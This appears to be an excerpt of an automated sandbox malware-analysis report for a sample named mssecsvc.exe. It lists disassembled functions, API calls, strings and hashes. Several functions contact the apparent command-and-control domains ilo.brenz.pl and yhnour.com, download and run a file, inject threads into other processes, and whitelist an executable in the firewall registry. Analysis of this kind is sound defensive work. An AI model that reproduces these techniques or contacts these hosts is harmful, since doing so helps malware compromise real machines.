lstrlen.KERNEL32(ilo.brenz.pl,?,00000000), ref: 7FE34057
gethostbyname.WS2_32(ilo.brenz.pl), ref: 7FE34066
wsprintfA.USER32 ref: 7FE34179
CreateThread.KERNEL32(00000000,00000000,Function_00003819,6F6C6902,00000000), ref: 7FE341B4
CloseHandle.KERNEL32(?,00000000,6F6C6902,7FE36AA2,00000000,00000000), ref: 7FE341BD
GetTickCount.KERNEL32 ref: 7FE341F6

Strings

D s, xrefs: 7FE3414F
020a00 . . :#73204497e +*, xrefs: 7FE34195, 7FE341DB

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Create$CloseHandleLibraryLoadThread$CountEventStartupTickVersionconnectgethostbynamelstrlensocketwsprintf
String ID: 020a00 . . :#73204497e +*$D s
API String ID: 2996464229-1659677742
Opcode ID: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
Instruction ID: 7cf70be6cf959998afdf9cae9a0d37e707ada541d42a8e21ccd1522646daf2c4
Opcode Fuzzy Hash: 98c4dc3622c81e610166b3295d4bccfe550f8d2832964dac318e74891848542e
Instruction Fuzzy Hash: 8981F071908358BFEB219F348C5DBDA7BADEF41304F444659E88A9E181C2F46F45C7A2

Function 00AD388E Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 127networksleeptimeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(00AD7584), ref: 00AD389F
Sleep.KERNEL32(0000EA60), ref: 00AD3911
InternetGetConnectedState.WININET(?,00000000), ref: 00AD392A
gethostbyname.WS2_32(0D278125), ref: 00AD396C
socket.WS2_32(00000002,00000001,00000000), ref: 00AD3981
ioctlsocket.WS2_32(?,8004667E), ref: 00AD399A
connect.WS2_32(?,?,00000010), ref: 00AD39B3
Sleep.KERNEL32(?,00000010,BB010002,00000000,8004667E,?,00000001), ref: 00AD39C1
closesocket.WS2_32 ref: 00AD3A20

Strings

yhnour.com, xrefs: 00AD38F1

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Sleep$ConnectedInternetStateSystemTimeclosesocketconnectgethostbynameioctlsocketsocket
String ID: yhnour.com
API String ID: 159131500-3038085945
Opcode ID: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
Instruction ID: 51a423ed92cfa5614b418316ddd3809860dbdd79367e0d44137d88c4f82f0b83
Opcode Fuzzy Hash: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
Instruction Fuzzy Hash: 1141B432604248BADF319F248C5EB9D7B6EAF85710F04402AF94ADE2C1D7F59F408721

Function 7FE3388E Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 127networksleeptimeCOMMON

Download Yara Rule

APIs

GetSystemTime.KERNEL32(7FE37584), ref: 7FE3389F
Sleep.KERNEL32(0000EA60), ref: 7FE33911
InternetGetConnectedState.WININET(?,00000000), ref: 7FE3392A
gethostbyname.WS2_32(0D278125), ref: 7FE3396C
socket.WS2_32(00000002,00000001,00000000), ref: 7FE33981
ioctlsocket.WS2_32(?,8004667E), ref: 7FE3399A
connect.WS2_32(?,?,00000010), ref: 7FE339B3
Sleep.KERNEL32(?,00000010,BB010002,00000000,8004667E,?,00000001), ref: 7FE339C1
closesocket.WS2_32 ref: 7FE33A20

Strings

yhnour.com, xrefs: 7FE338F1

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: Sleep$ConnectedInternetStateSystemTimeclosesocketconnectgethostbynameioctlsocketsocket
String ID: yhnour.com
API String ID: 159131500-3038085945
Opcode ID: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
Instruction ID: b07a7bcf83e6419e821945e762614e4a8bec5a082f9a477666759957ccd44e88
Opcode Fuzzy Hash: b9cbcd502034ca6391bc477693aeae1c9470f5e239758c46d06d44a479c792e4
Instruction Fuzzy Hash: 8441B131A04348BEEB218E208C4EBDABBAEEF85714F404129F94ADE1C1D7F59B40D720

Function 7FE307AC Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 62processthreadinjectionCOMMON

Download Yara Rule

APIs

Part of subcall function 7FE3144A: LookupPrivilegeValueA.ADVAPI32(00000000,?), ref: 7FE3145A
Part of subcall function 7FE3144A: NtAdjustPrivilegesToken.NTDLL(?,00000000,?,00000000,00000000,00000000), ref: 7FE3146A

CloseHandle.KERNEL32(?), ref: 7FE305AD
FreeLibrary.KERNEL32(75670000,?,7FE3079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FE307B8
CloseHandle.KERNEL32(?,?,7FE3079B,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FE307BF
CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,00000000,000077C4,00000000,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FE307C9
Process32First.KERNEL32 ref: 7FE307DC
Process32Next.KERNEL32 ref: 7FE307ED
OpenProcess.KERNEL32(0000002A,00000000,?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FE30805
CreateRemoteThread.KERNEL32(?,00000000,00000000,-00003C38,00000002,00000000), ref: 7FE30842
CloseHandle.KERNEL32(?,?,?,?,?,?,00000002,00000000,00000040,00000000,000077C4), ref: 7FE3085D
CloseHandle.KERNEL32 ref: 7FE3086C

Strings

csrs, xrefs: 7FE3082C

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CloseHandle$CreateProcess32$AdjustFirstFreeLibraryLookupNextOpenPrivilegePrivilegesProcessRemoteSnapshotThreadTokenToolhelp32Value
String ID: csrs
API String ID: 3908997113-2321902090
Opcode ID: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
Instruction ID: 3cc730a2f3ef03ba179077d9d1a3c9c733a6918c7a23fe3b4e4107910752f9d1
Opcode Fuzzy Hash: 214ed8d877d5af5bdcbfeb92dfaf8d9be1786541dc830f75d8708442990ea625
Instruction Fuzzy Hash: 5E113030902205BBEB255F21CD4DBBF3A7DEF44715F40012CFA4B99041CAB49B05CA6A

Function 00AD2768 Relevance: 12.1, APIs: 8, Instructions: 85networkCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104), ref: 00AD278C

Part of subcall function 00AD27A7: GetTempFileNameA.KERNEL32(?,00AD27A3,00000000,?), ref: 00AD27A8
Part of subcall function 00AD27A7: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,00AD27A3,00000000,?), ref: 00AD27C3
Part of subcall function 00AD27A7: InternetReadFile.WININET(?,?,00000104), ref: 00AD27DD
Part of subcall function 00AD27A7: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,00AD27A3,00000000,?), ref: 00AD27F3
Part of subcall function 00AD27A7: CloseHandle.KERNEL32(?,00000104,?,00000000,?,00AD27A3,00000000,?), ref: 00AD27FF
Part of subcall function 00AD27A7: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,00AD27A3), ref: 00AD2823
Part of subcall function 00AD27A7: InternetCloseHandle.WININET(?), ref: 00AD2833

InternetCloseHandle.WININET(00000000), ref: 00AD283A

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: File$CloseHandleInternet$CreateTemp$NamePathProcessReadWrite
String ID:
API String ID: 1995088466-0
Opcode ID: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
Instruction ID: 36b17062a8ad0b429b00ad0a499ec7ab323161c4023bd03befe83610c844b935
Opcode Fuzzy Hash: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
Instruction Fuzzy Hash: B42190B1144206BFE7315B20CC8EFFF7A2DEFA5B10F000519FA4A99182D7B19E55C6A6

Function 7FE32768 Relevance: 12.1, APIs: 8, Instructions: 85networkCOMMON

Download Yara Rule

APIs

GetTempPathA.KERNEL32(00000104), ref: 7FE3278C

Part of subcall function 7FE327A7: GetTempFileNameA.KERNEL32(?,7FE327A3,00000000,?), ref: 7FE327A8
Part of subcall function 7FE327A7: CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,7FE327A3,00000000,?), ref: 7FE327C3
Part of subcall function 7FE327A7: InternetReadFile.WININET(?,?,00000104), ref: 7FE327DD
Part of subcall function 7FE327A7: WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,7FE327A3,00000000,?), ref: 7FE327F3
Part of subcall function 7FE327A7: CloseHandle.KERNEL32(?,00000104,?,00000000,?,7FE327A3,00000000,?), ref: 7FE327FF
Part of subcall function 7FE327A7: CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,7FE327A3), ref: 7FE32823
Part of subcall function 7FE327A7: InternetCloseHandle.WININET(?), ref: 7FE32833

InternetCloseHandle.WININET(00000000), ref: 7FE3283A

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: File$CloseHandleInternet$CreateTemp$NamePathProcessReadWrite
String ID:
API String ID: 1995088466-0
Opcode ID: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
Instruction ID: f718f427be36361d75953774a1f7d46c56e3500d5ea13527a7314fc48a79ac1e
Opcode Fuzzy Hash: 2d38deb6aefaf5fafd3701ae89f7df2c8b85ad1d9cd8c4e8e23ab3e50bde978c
Instruction Fuzzy Hash: D121D2B1545306BFE7215A20CC8EFFF3A2DEF95B10F000119FA4A99081D7B1AA15C6B6

Function 7FE327A7 Relevance: 12.1, APIs: 8, Instructions: 65filenetworkprocessCOMMON

Download Yara Rule

APIs

GetTempFileNameA.KERNEL32(?,7FE327A3,00000000,?), ref: 7FE327A8
CreateFileA.KERNEL32(?,40000000,00000001,00000000,00000002,00000000,00000000,?,7FE327A3,00000000,?), ref: 7FE327C3
InternetReadFile.WININET(?,?,00000104), ref: 7FE327DD
WriteFile.KERNEL32(?,?,?,?,00000000,00000000,00000104,?,00000000,?,7FE327A3,00000000,?), ref: 7FE327F3
CloseHandle.KERNEL32(?,00000104,?,00000000,?,7FE327A3,00000000,?), ref: 7FE327FF
CreateProcessA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,00000104,?,00000000,?,7FE327A3), ref: 7FE32823
InternetCloseHandle.WININET(?), ref: 7FE32833
InternetCloseHandle.WININET(00000000), ref: 7FE3283A

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: File$CloseHandleInternet$Create$NameProcessReadTempWrite
String ID:
API String ID: 3452404049-0
Opcode ID: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
Instruction ID: 3bd9faa3a5304dd3e56ad62dc96b59a222f247842b0644106e5356e74212cdb4
Opcode Fuzzy Hash: bbf5c5561a5178fb7ef464295b4b729c13e68fcf671b41c3dcb44b7c67eff673
Instruction Fuzzy Hash: 7B116DB1510606BBEB250B20CC4EFFB7A2DFF85B14F404519FA4699080DBF5AA5196A8

Function 00AD10CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(03C1FBC4), ref: 00AD113D
GetProcAddress.KERNEL32(00000000,00AD11D6), ref: 00AD1148

Strings

.DLL, xrefs: 00AD1133

Memory Dump Source

Source File: 00000006.00000002.1710796536.0000000000AD0000.00000040.10000000.00040000.00000000.sdmp, Offset: 00AD0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_ad0000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: .DLL
API String ID: 1646373207-899428287
Opcode ID: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
Instruction ID: e751a7863ae893c14071b79070a00b5d658e8c5c6f3461a838edd442ab3669e2
Opcode Fuzzy Hash: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
Instruction Fuzzy Hash: FC019270607005FADF659F6CC949AAA3B7DFF04355F10421AFA1B8B36AC7708E808695

Function 7FE310CE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 54libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(03C1FBC4), ref: 7FE3113D
GetProcAddress.KERNEL32(00000000,7FE311D6), ref: 7FE31148

Strings

.DLL, xrefs: 7FE31133

Memory Dump Source

Source File: 00000006.00000002.1712925890.000000007FE30000.00000040.10000000.00040000.00000000.sdmp, Offset: 7FE30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_7fe30000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AddressHandleModuleProc
String ID: .DLL
API String ID: 1646373207-899428287
Opcode ID: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
Instruction ID: 53e3f59e3ca93c8d7ab4e5012bd1743a21eb7cc43ac6dec3ec0dbf52940c216a
Opcode Fuzzy Hash: 82aecbdba2b6c313781f1a35b90d956a9f8d4ce40e6713e346beece58f6b0b34
Instruction Fuzzy Hash: E001D634E07104EACB528E38C84DBDE3B7DFF44265F80411DD91A8F159C7789A40CBA5

Analysis Process: mssecsvc.exePID: 5568, Parent PID: 5860COMMON

Execution Graph

Execution Coverage:	0.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	0%
Total number of Nodes:	353
Total number of Limit Nodes:	2

Executed Functions

Function 7FE44499 Relevance: 1.6, APIs: 1, Instructions: 83
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNELBASE(?,C0000000,00000001,00000000,00000003,00000000,00000000,?,65676E61,?,?,7FE44406,?,7FE443E8,?,7FE443C4), ref: 7FE444ED

Memory Dump Source

Source File: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: a597af1445ea8736db27a55b35799f807b5cdfd84ba473e7882835a9cfdd7254
Instruction ID: 7546c9a9d357b7e1dadf9586052fd295a6a3be759e7d42c7efdb4b51d27ad5e1
Opcode Fuzzy Hash: a597af1445ea8736db27a55b35799f807b5cdfd84ba473e7882835a9cfdd7254
Instruction Fuzzy Hash: 22216070305309BFEF218E619C45BBA366CAF00219F51122DFE2A9E094D7F4AF058728

Non-executed Functions

Function 7FE43C3D Relevance: 47.7, APIs: 21, Strings: 6, Instructions: 487
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetWindowsDirectoryA.KERNEL32(020a00 . . :#73204497e +*,00000104), ref: 7FE43CA1
GetProcAddress.KERNEL32(00000000,00000002), ref: 7FE43CD4
GetProcAddress.KERNEL32(00000000,7FE43D41), ref: 7FE43D4C
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE43D5F
GetTickCount.KERNEL32 ref: 7FE43D93
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE46EF6,00000000,00000000,00000000,00000000), ref: 7FE43E65
GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#73204497e +*,000000C8), ref: 7FE43EE2

Strings

ADVAPI32.DLL, xrefs: 7FE43D5E
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE43F0C
\DEVICE\AFD\ENDPOINT, xrefs: 7FE441DA
020a00 . . :#73204497e +*, xrefs: 7FE43CA0, 7FE43D06, 7FE43D16, 7FE43EDF, 7FE43EF4, 7FE43F0B, 7FE44195, 7FE441DB
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE43EF6, 7FE43F08
D s, xrefs: 7FE4414F

Memory Dump Source

Source File: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AddressProc$CountDirectoryFileInformationLibraryLoadModuleNameTickVolumeWindows
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
API String ID: 1749273276-1098094878
Opcode ID: 52851077f5d53f69d58aa784cc1854b2e94257a57670201441823f58a38ae1fa
Instruction ID: a9c893c36cba37f36994ff1ade31cd64da17a3bb77e2321a458bf3f53f95c566
Opcode Fuzzy Hash: 52851077f5d53f69d58aa784cc1854b2e94257a57670201441823f58a38ae1fa
Instruction Fuzzy Hash: 9102E071509358BFEB229F209C0ABEA7BACEF41304F00551DFC4A9E081D6F46F459BA6

Function 7FE43CC2 Relevance: 45.9, APIs: 20, Strings: 6, Instructions: 432
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(7FE43CBA), ref: 7FE43CC2
GetProcAddress.KERNEL32(00000000,00000002), ref: 7FE43CD4
GetProcAddress.KERNEL32(00000000,7FE43D41), ref: 7FE43D4C
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE43D5F
GetTickCount.KERNEL32 ref: 7FE43D93

Strings

ADVAPI32.DLL, xrefs: 7FE43D5E
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE43F0C
\DEVICE\AFD\ENDPOINT, xrefs: 7FE441DA
020a00 . . :#73204497e +*, xrefs: 7FE43D16, 7FE43EDF, 7FE43EF4, 7FE43F0B, 7FE44195, 7FE441DB
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE43EF6, 7FE43F08
D s, xrefs: 7FE4414F

Memory Dump Source

Source File: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AddressProc$CountHandleLibraryLoadModuleTick
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
API String ID: 2837544101-1098094878
Opcode ID: 11790b7d93145b92564ec9d4155d1899de06e17603de67d5beaef9747acc1a7f
Instruction ID: c453ebe4c61d0623fc47b3a56a20a6bb1634521f5f2c168e6baeb2cb6925c9c1
Opcode Fuzzy Hash: 11790b7d93145b92564ec9d4155d1899de06e17603de67d5beaef9747acc1a7f
Instruction Fuzzy Hash: CEE1F171509358BFEB229F209C4ABEA7BACEF41304F00555DFC4A8E081D6F46F059BA6

Function 7FE43CF0 Relevance: 45.9, APIs: 20, Strings: 6, Instructions: 409
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(7FE43CE5), ref: 7FE43CF0
GetSystemDirectoryA.KERNEL32(020a00 . . :#73204497e +*,00000104), ref: 7FE43D07

Part of subcall function 7FE43D1F: lstrcat.KERNEL32(020a00 . . :#73204497e +*,7FE43D12), ref: 7FE43D20
Part of subcall function 7FE43D1F: GetProcAddress.KERNEL32(00000000,7FE43D41), ref: 7FE43D4C
Part of subcall function 7FE43D1F: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE43D5F
Part of subcall function 7FE43D1F: GetTickCount.KERNEL32 ref: 7FE43D93
Part of subcall function 7FE43D1F: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE46EF6,00000000,00000000,00000000,00000000), ref: 7FE43E65

Strings

ADVAPI32.DLL, xrefs: 7FE43D5E
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE43F0C
\DEVICE\AFD\ENDPOINT, xrefs: 7FE441DA
020a00 . . :#73204497e +*, xrefs: 7FE43D06, 7FE43D16, 7FE43EDF, 7FE43EF4, 7FE43F0B, 7FE44195, 7FE441DB
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE43EF6, 7FE43F08
D s, xrefs: 7FE4414F

Memory Dump Source

Source File: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: AddressCountDirectoryHandleInformationLibraryLoadModuleProcSystemTickVolumelstrcat
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
API String ID: 215653160-1098094878
Opcode ID: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
Instruction ID: a575d1816f1fafdbe36b7d8d9a618c6fc80930f7c3831f5bc8b2ed9575ddbc2a
Opcode Fuzzy Hash: 260c0d83971146764b612a54da98fff840ddc31a6bb3a69eed28180f54add843
Instruction Fuzzy Hash: 23E1DF71509358BFEB229F209C0ABEA7BACEF42304F00655DFC4A9E081D6F46F459B65

Function 7FE43D1F Relevance: 44.1, APIs: 19, Strings: 6, Instructions: 389
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcat.KERNEL32(020a00 . . :#73204497e +*,7FE43D12), ref: 7FE43D20

Part of subcall function 7FE43D36: LoadLibraryA.KERNEL32(7FE43D2B), ref: 7FE43D36
Part of subcall function 7FE43D36: GetProcAddress.KERNEL32(00000000,7FE43D41), ref: 7FE43D4C
Part of subcall function 7FE43D36: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE43D5F
Part of subcall function 7FE43D36: GetTickCount.KERNEL32 ref: 7FE43D93
Part of subcall function 7FE43D36: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE46EF6,00000000,00000000,00000000,00000000), ref: 7FE43E65

Strings

ADVAPI32.DLL, xrefs: 7FE43D5E
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE43F0C
\DEVICE\AFD\ENDPOINT, xrefs: 7FE441DA
020a00 . . :#73204497e +*, xrefs: 7FE43D1F, 7FE43EDF, 7FE43EF4, 7FE43F0B, 7FE44195, 7FE441DB
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE43EF6, 7FE43F08
D s, xrefs: 7FE4414F

Memory Dump Source

Source File: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressCountInformationProcTickVolumelstrcat
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
API String ID: 2038497427-1098094878
Opcode ID: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
Instruction ID: 426a991c9d28a372a142f780a5599c1fe21c99d29c9374d1d361bc923b179bdc
Opcode Fuzzy Hash: 9a3d42354aede4d92b231a7e1a08d8f1ff67a071c39a48690dfdf21ca6a4930c
Instruction Fuzzy Hash: 71E1ED71509358BFEB229F209C0ABEA7BACEF42304F00655DFC4A9E081D6F46F459B65

Function 7FE43D36 Relevance: 44.1, APIs: 19, Strings: 6, Instructions: 379
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryA.KERNEL32(7FE43D2B), ref: 7FE43D36

Part of subcall function 7FE43D4B: GetProcAddress.KERNEL32(00000000,7FE43D41), ref: 7FE43D4C
Part of subcall function 7FE43D4B: LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE43D5F
Part of subcall function 7FE43D4B: GetTickCount.KERNEL32 ref: 7FE43D93
Part of subcall function 7FE43D4B: GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE46EF6,00000000,00000000,00000000,00000000), ref: 7FE43E65

Strings

ADVAPI32.DLL, xrefs: 7FE43D5E
SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List, xrefs: 7FE43F0C
\DEVICE\AFD\ENDPOINT, xrefs: 7FE441DA
020a00 . . :#73204497e +*, xrefs: 7FE43EDF, 7FE43EF4, 7FE43F0B, 7FE44195, 7FE441DB
C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1, xrefs: 7FE43EF6, 7FE43F08
D s, xrefs: 7FE4414F

Memory Dump Source

Source File: 0000000C.00000002.1696529532.000000007FE40000.00000040.80000000.00040000.00000000.sdmp, Offset: 7FE40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_7fe40000_mssecsvc.jbxd

Yara matches

Similarity

API ID: LibraryLoad$AddressCountInformationProcTickVolume
String ID: 020a00 . . :#73204497e +*$ADVAPI32.DLL$C:\Windows\sysWOW64\wbem\wmiprvse.exe:*:enabled:@shell32.dll,-1$D s$SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List$\DEVICE\AFD\ENDPOINT
API String ID: 3734769084-1098094878
Opcode ID: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
Instruction ID: b6e5c684999b5124a360ce0b6569c1417190782f1e811f7b4d9ad18746e01973
Opcode Fuzzy Hash: fe378de023044d5e93c1fdb9f401057012e9a432939cf19daad1b95bd79d3ac1
Instruction Fuzzy Hash: 57D1DC71509358BFEB229F609C0ABEA7BACEF41304F00261DFC4A9E081D6F46F459B65

Function 7FE43D4B Relevance: 42.4, APIs: 18, Strings: 6, Instructions: 386
librarythreadnetworkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32(00000000,7FE43D41), ref: 7FE43D4C
LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 7FE43D5F
GetTickCount.KERNEL32 ref: 7FE43D93
GetVolumeInformationA.KERNEL32(00000000,00000000,00000000,7FE46EF6,00000000,00000000,00000000,00000000), ref: 7FE43E65
GetModuleFileNameA.KERNEL32(00000000,020a00 . . :#73204497e +*,000000C8), ref: 7FE43EE2
wsprintfA.USER32 ref: 7FE43EF7
CreateThread.KERNEL32(00000000,00000000,7FE43691,00000000,00000000), ref: 7FE43F40
CloseHandle.KERNEL32(?,780B832E), ref: 7FE43F49
CreateThread.KERNEL32(00000000,00000000,Function_00003888,00000000,00000000), ref: 7FE43FE9
CloseHandle.KERNEL32(?,00000000), ref: 7FE43FF2
CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,?,00000000), ref: 7FE43FFF
socket.WS2_32(00000002,00000001,00000000), ref: 7FE44097
connect.WS2_32(6F6C6902,7FE43B09,00000010), ref: 7FE440B1
GetVersionExA.KERNEL32(?,?,00000000), ref: 7FE440FB
wsprintfA.USER32 ref: 7FE44179
